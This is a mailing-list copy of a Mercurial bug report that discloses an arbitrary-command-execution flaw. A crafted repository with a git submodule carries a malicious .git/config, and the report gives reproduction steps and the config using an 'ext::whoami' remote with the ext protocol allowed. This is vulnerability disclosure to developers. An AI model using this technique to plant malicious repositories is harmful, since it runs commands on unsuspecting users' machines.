[Bug 5730] New: [CRITICAL]Arbitrary command execution in mercurial repo with a git submodule
mercurial-bugs at mercurial-scm.org
mercurial-bugs at mercurial-scm.org
Fri Nov 3 02:30:42 UTC 2017
https://bz.mercurial-scm.org/show_bug.cgi?id=5730
Bug ID: 5730
Summary: [CRITICAL]Arbitrary command execution in mercurial
repo with a git submodule
Product: Mercurial
Version: stable branch
Hardware: All
OS: All
Status: UNCONFIRMED
Severity: bug
Priority: wish
Component: Mercurial
Assignee: bugzilla at mercurial-scm.org
Reporter: pnigos at live.com
CC: mercurial-devel at mercurial-scm.org
I found that using hg to track a crafted mercurial repo with a git submodule
can lead to command execution on user's OS.
The root cause is that hg support to add a git submodule to a hg repo.And so
that i can use hg to track .git directory and thus modify the git config file
from the remote.I use ext helper protocol as a poc.I can modify the git config
file to allow ext helper protocol which has been disallowed in the lastest
version of git and then when victim do anything on the evil git submodule,ext
protocol will be triggered and execute the os command.
Here is the reproduction steps:
1.Create a hg repo;
2.Create a git repo and make a commit to it.(The commit is a must.)
3.Now let us use hg to make a crafted hg repo first.
4.Using hg to checkout the hg repo and then add that git repo as it's
submodule.
5.Modify the ./hgrepo/gitsubmodule/.git/config to sth like:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
[remote "pwn2own"]
url = ext::whoami
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
[protocol]
allow = always
I modify two parts,change the remote url to "ext::whoami" and add a protocol
section to allow ext protocol to be used.
Then commit all above changes and push to the remote.
When other victim using hg command to clone that crafted repo and
pull,fetch,checkout,push,etc in the git submodule.Our command will be
executed.As we already can control the git config file on the remote,lots of
options we can use to execute command or do other things.
Mercurial accidently cover the .git folder with user applied .git folder during
hg cloning so that give attacker a chance to modify the config file and lead to
command execution.
This one i firstly reported to sourcetree but later i found the root cause was
on the mercurial side,so i decided to double report it here.
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the Mercurial-devel
mailing list